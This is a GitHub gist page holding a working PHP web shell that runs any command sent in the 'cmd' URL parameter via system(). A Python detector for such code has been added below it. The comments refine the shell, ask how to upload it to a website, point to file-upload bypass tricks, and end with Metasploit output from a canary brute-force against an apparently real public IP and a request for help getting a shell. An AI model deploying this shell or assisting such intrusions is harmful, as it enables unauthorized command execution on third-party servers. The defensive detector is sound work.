@joswr1ght
Last active January 12, 2025 07:51
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
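
A defender's view of the snippet above, as an added example (not part of the gist and not written by its author): a small Python heuristic that flags PHP source where a request superglobal reaches a command-execution function, either directly or through a simple variable assignment. The names `find_request_to_shell` and `INDIRECT_SAMPLE` are constructed for illustration; the line-based matching is an assumption that keeps the check short and will miss multi-line or obfuscated code.

```python
import re

# PHP functions that run an operating-system command.
EXEC_CALL = re.compile(
    r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(([^;]*)", re.I)
# Request-controlled superglobals.
SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# Simple assignment "$var = expr;" or "$var .= expr;" (not "==").
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?!=)\s*([^;]*);")

def _tainted_var(expr, tainted):
    """Return the first tainted variable used in expr, or None."""
    for var in sorted(tainted):
        if re.search(re.escape(var) + r"\b", expr):
            return var
    return None

def find_request_to_shell(php_source):
    """Return (line_no, function, source) for exec calls fed by request data."""
    tainted, findings = set(), []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for func, args in EXEC_CALL.findall(line):
            hit = SOURCE.search(args)
            source = hit.group(0) if hit else _tainted_var(args, tainted)
            if source:
                findings.append((line_no, func.lower(), source))
        # Propagate taint after checking the calls on this line.
        for var, expr in ASSIGN.findall(line):
            if SOURCE.search(expr) or _tainted_var(expr, tainted):
                tainted.add(var)
    return findings

# The PHP portion of the snippet above.
GIST_SNIPPET = """<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>"""

# Constructed sample: the request value reaches the shell through a variable.
INDIRECT_SAMPLE = """<?php
$c = $_REQUEST['q'];
echo shell_exec($c);
system('uptime');
"""

if __name__ == "__main__":
    print(find_request_to_shell(GIST_SNIPPET), find_request_to_shell(INDIRECT_SAMPLE))
```
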
@larsonreever

However, there are a number of potential entry points, from coding errors in the web application to configuration issues in either the web server or PHP, and you need only one single exploitable vulnerability to be successful. One can have a good overview of web shells with examples here: https://secure.wphackedhelp.com/blog/web-shell-php-exploit/

@Sh1n0g1

Sh1n0g1 commented Jul 15, 2019

It's better to have the isset function before accessing the global variable $_GET['cmd']
like this if(isset($_GET['cmd']))

@joswr1ght
Author

> It's better to have the isset function before accessing the global variable $_GET['cmd']
> like this if(isset($_GET['cmd']))

👍Thanks!

@fractalspace

Nice and simple

@sahiljack

That's actually helpful. Thanks

@EphDoering

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

@joswr1ght
Author

> You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

Updated, thank you!

@rmdhfz

rmdhfz commented Sep 6, 2021

Nice.....

@KnightChaser

Thank you :) 👍

@achabi-ismail

thanks

@unaiiM

unaiiM commented Apr 26, 2023

better:

if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2&<1');
}

Adding 2&<1 you can see the error output.

@pdwilso

pdwilso commented Jan 7, 2024

> better:
>
> if(isset($_GET['cmd']))
> {
>     system($_GET['cmd'] . ' 2&<1');
> }
>
> Adding 2&<1 you can see the error output.

TY

@joswr1ght
Author

> better:
>
> if(isset($_GET['cmd']))
> {
>     system($_GET['cmd'] . ' 2&<1');
> }
>
> Adding 2&<1 you can see the error output.

It's 2>&1 to redirect STDERR to STDOUT. Added, thanks!

@ADMIN999975

if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2&<1');
}

@blockwizard777

Could you please let me know how to upload the webshell file on website?

@joswr1ght
Author

> Could you please let me know how to upload the webshell file on website?

This is the hard part. You need to identify a vulnerability to exploit first, then when you're successful, you can use a script like this one for remote access. This script is a secondary tool; you need to gain that access first. Good luck!

@codedsprit

> Could you please let me know how to upload the webshell file on website?

Hey, we need some deep knowledge for what you want to know. I can't write everything here, but study about file upload vulnerability, tons of resources there. You can check this also:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/README.md#upload-tricks

@craccbabyy

Thank you bro! I was trying www's PHP webshell and I can't get it to work

@bdelusions

metasploit [*] Started reverse TCP handler on 10.0.2.15:4444
[*] 81.70.92.51:80 - Searching for stack canary
[*] 81.70.92.51:80 - Assuming byte 0 0x00
[*] 81.70.92.51:80 - Brute forcing byte 1
[+] 81.70.92.51:80 - Byte 1 found: 0x07
[*] 81.70.92.51:80 - Brute forcing byte 2
[+] 81.70.92.51:80 - Byte 2 found: 0x01
[*] 81.70.92.51:80 - Brute forcing byte 3
[+] 81.70.92.51:80 - Byte 3 found: 0x00
[+] 81.70.92.51:80 - Canary found: 0x00010700

[*] Exploit completed, but no session was created.

Any ideas how I can solve this?

Just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project, and I am stuck here.
Pointers would be much appreciated.
